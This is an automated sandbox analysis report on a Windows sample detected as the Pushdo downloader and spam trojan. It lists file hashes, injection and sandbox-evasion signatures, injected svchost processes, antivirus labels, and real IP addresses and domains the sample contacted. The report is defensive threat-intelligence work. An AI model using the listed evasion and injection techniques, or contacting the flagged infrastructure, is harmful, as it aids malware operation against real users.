Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6gjnnBAbpc.exe

Overview

General Information

Sample Name:6gjnnBAbpc.exe
Original Sample Name:9faea65cff61ad64e4bc4c3913c336be.exe
Analysis ID:831928
MD5:9faea65cff61ad64e4bc4c3913c336be
SHA1:4fac3a2b3e76ee1b31a369ed53d145218952a340
SHA256:987204ca82337f0a3f28097a5d66d5f3ecb11d43d82f67cd753d0bf2ce40b7a7
Tags:32Cutwailexe
Infos:

Detection

Pushdo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Backdoor Pushdo
Early bird code injection technique detected
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Writes to foreign memory regions
Found stalling execution ending in API Sleep call
Machine Learning detection for sample
Injects a PE file into a foreign processes
Send many emails (e-Mail Spam)
Queues an APC in another process (thread injection)
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Tries to resolve many domain names, but no domain seems valid
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Connects to many different domains
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evasive API chain (may stop execution after accessing registry keys)
Drops PE files to the user directory
Creates or modifies windows services
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • 6gjnnBAbpc.exe (PID: 5932 cmdline: C:\Users\user\Desktop\6gjnnBAbpc.exe MD5: 9FAEA65CFF61AD64E4BC4C3913C336BE)
    • svchost.exe (PID: 5264 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5260 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 1640 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5560 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5128 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 7420 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 1332 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 9FAEA65CFF61AD64E4BC4C3913C336BE)
    • svchost.exe (PID: 6052 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 10440 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 11604 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 13740 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 16472 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 23940 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 5956 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 9FAEA65CFF61AD64E4BC4C3913C336BE)
    • svchost.exe (PID: 4400 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 23212 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 23252 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 23308 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6004 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PushdoPushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.671122999.0000000010004000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
    00000001.00000002.642040224.00000000024C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
      00000002.00000002.642410962.0000000000F10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
        00000001.00000002.669497358.0000000010004000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
          00000000.00000002.651890416.0000000002790000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            1.2.pigalicapi.exe.24c1e88.2.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
              0.2.6gjnnBAbpc.exe.10004088.14.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                2.2.pigalicapi.exe.10004088.11.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                  2.2.pigalicapi.exe.f11e88.1.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                    1.2.pigalicapi.exe.10004088.11.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                      Click to see the 21 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.580.93.82.3349698802016867 03/22/23-05:43:08.122042
                      SID:2016867
                      Source Port:49698
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 6gjnnBAbpc.exeVirustotal: Detection: 17%Perma Link
                      Source: 6gjnnBAbpc.exeReversingLabs: Detection: 29%
                      Source: http://www.credo.edu.pl/Avira URL Cloud: Label: malware
                      Source: C:\Users\user\pigalicapi.exeReversingLabs: Detection: 29%
                      Source: 6gjnnBAbpc.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\pigalicapi.exeJoe Sandbox ML: detected
                      Source: 6.3.svchost.exe.2fe0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 3.3.svchost.exe.3aa0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 10.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 22.2.svchost.exe.406b200.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 11.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 15.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 3.2.svchost.exe.406b200.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 1.2.pigalicapi.exe.10010318.12.unpackAvira: Label: TR/Downloader.Gen
                      Source: 12.2.svchost.exe.4004000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 17.2.svchost.exe.7ebd0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 16.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 1.2.pigalicapi.exe.24c1e88.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 2.2.pigalicapi.exe.f3e290.5.unpackAvira: Label: TR/Downloader.Gen
                      Source: 0.2.6gjnnBAbpc.exe.10004088.14.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 19.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 11.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 2.2.pigalicapi.exe.10004088.11.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 22.2.svchost.exe.4050e00.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 1.2.pigalicapi.exe.10004088.11.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 12.2.svchost.exe.4050e00.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 3.3.svchost.exe.3bf0000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 0.2.6gjnnBAbpc.exe.400e290.12.unpackAvira: Label: TR/Downloader.Gen
                      Source: 22.2.svchost.exe.4004000.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 3.3.svchost.exe.3bf0000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 2.2.pigalicapi.exe.10010318.12.unpackAvira: Label: TR/Downloader.Gen
                      Source: 6.2.svchost.exe.4050e00.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 7.2.svchost.exe.4050e00.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 1.2.pigalicapi.exe.24e0000.4.unpackAvira: Label: TR/Spy.Gen
                      Source: 1.3.pigalicapi.exe.47212b9.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 14.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 2.2.pigalicapi.exe.f11e88.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 9.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 2.2.pigalicapi.exe.f30000.4.unpackAvira: Label: TR/Spy.Gen
                      Source: 3.3.svchost.exe.54a0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                      Source: 7.3.svchost.exe.54a0000.0.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 18.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 1.3.pigalicapi.exe.46f04b9.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.6gjnnBAbpc.exe.2790000.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.2.svchost.exe.406b200.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 19.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 3.3.svchost.exe.3bf0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 14.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 21.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 3.2.svchost.exe.4036a00.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 3.2.svchost.exe.4004000.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.3.svchost.exe.54a0000.0.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 21.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 3.2.svchost.exe.4050e00.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.6gjnnBAbpc.exe.4000000.11.unpackAvira: Label: TR/Spy.Gen
                      Source: 8.2.svchost.exe.7eff0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 7.3.svchost.exe.2fe0000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 6.3.svchost.exe.2ff0000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 7.2.svchost.exe.406b200.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 22.2.svchost.exe.4036a00.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 0.2.6gjnnBAbpc.exe.2791e88.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 12.2.svchost.exe.4036a00.6.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 18.2.svchost.exe.13140000.1.unpackAvira: Label: TR/Proxy.Gen
                      Source: 2.3.pigalicapi.exe.47712b9.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 7.2.svchost.exe.4004000.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 2.2.pigalicapi.exe.f10000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 2.3.pigalicapi.exe.47404b9.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 7.2.svchost.exe.4036a00.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 1.2.pigalicapi.exe.29f04b9.7.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 15.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 17.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 6.2.svchost.exe.4004000.5.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.3.svchost.exe.2ff0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 6.3.svchost.exe.2ff0000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 3.3.svchost.exe.54a0000.2.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 6.2.svchost.exe.4036a00.4.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 1.2.pigalicapi.exe.24c0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 12.2.svchost.exe.406b200.3.unpackAvira: Label: TR/Patched.Ren.Gen
                      Source: 10.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 7.3.svchost.exe.2fe0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 1.2.pigalicapi.exe.24ee290.5.unpackAvira: Label: TR/Downloader.Gen
                      Source: 9.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 7.3.svchost.exe.2fd0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 0.2.6gjnnBAbpc.exe.279e118.7.unpackAvira: Label: TR/Downloader.Gen
                      Source: 13.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 2.2.pigalicapi.exe.f1e118.3.unpackAvira: Label: TR/Downloader.Gen
                      Source: 7.3.svchost.exe.2fe0000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 16.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: 1.2.pigalicapi.exe.24ce118.3.unpackAvira: Label: TR/Downloader.Gen
                      Source: 13.2.svchost.exe.7e6e0000.1.unpackAvira: Label: TR/ATRAPS.Gen
                      Source: 0.2.6gjnnBAbpc.exe.10010318.13.unpackAvira: Label: TR/Downloader.Gen
                      Source: 8.2.svchost.exe.4000000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_040047F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,0_2_040047F0
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04004C47 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,0_2_04004C47
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008800
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_04008970
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008A70
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_04008BB0
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04008CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,0_2_04008CF0
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 0_2_04004880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,0_2_04004880
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E47F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,1_2_024E47F0
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_024E8A70
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E4BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,1_2_024E4BA0
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E8BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_024E8BB0
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_024E8800
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,1_2_024E8970
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E4880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,1_2_024E4880
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_024E8CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,1_2_024E8CF0
                      Source: 6gjnnBAbpc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:62416 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:62418 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.5:62424 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:62415 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:62419 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:62414 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:62417 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:62413 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:50143 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:50153 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:50171 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50205 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:50206 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:50232 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50293 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:50315 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:50314 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:50274 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:50316 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:50319 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.5:50328 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:51189 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:52021 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:53629 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:53662 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:53343 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.5:53761 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:53822 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:53819 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:53915 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:53931 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:55181 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:55278 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:56144 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:56207 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:59805 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:60568 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:60665 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:60953 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:61710 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:61785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:62444 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:62294 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:62475 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.5:62498 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:62500 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:62536 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:62529 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:62544 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:62578 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:62542 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:62560 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:22763 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:22849 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:23522 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.5:24097 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:24451 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:24424 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:24947 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:25237 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:25239 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:25909 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:24562 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:26500 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:26920 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:27376 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:27407 version: TLS 1.2
                      Source: C:\Users\user\Desktop\6gjnnBAbpc.exeCode function: 4x nop then sub esp, 1Ch0_2_00417380
                      Source: C:\Users\user\pigalicapi.exeCode function: 4x nop then sub esp, 1Ch1_2_00417380

                      Networking

                      barindex
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dayvo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shteeble.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.7.17 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
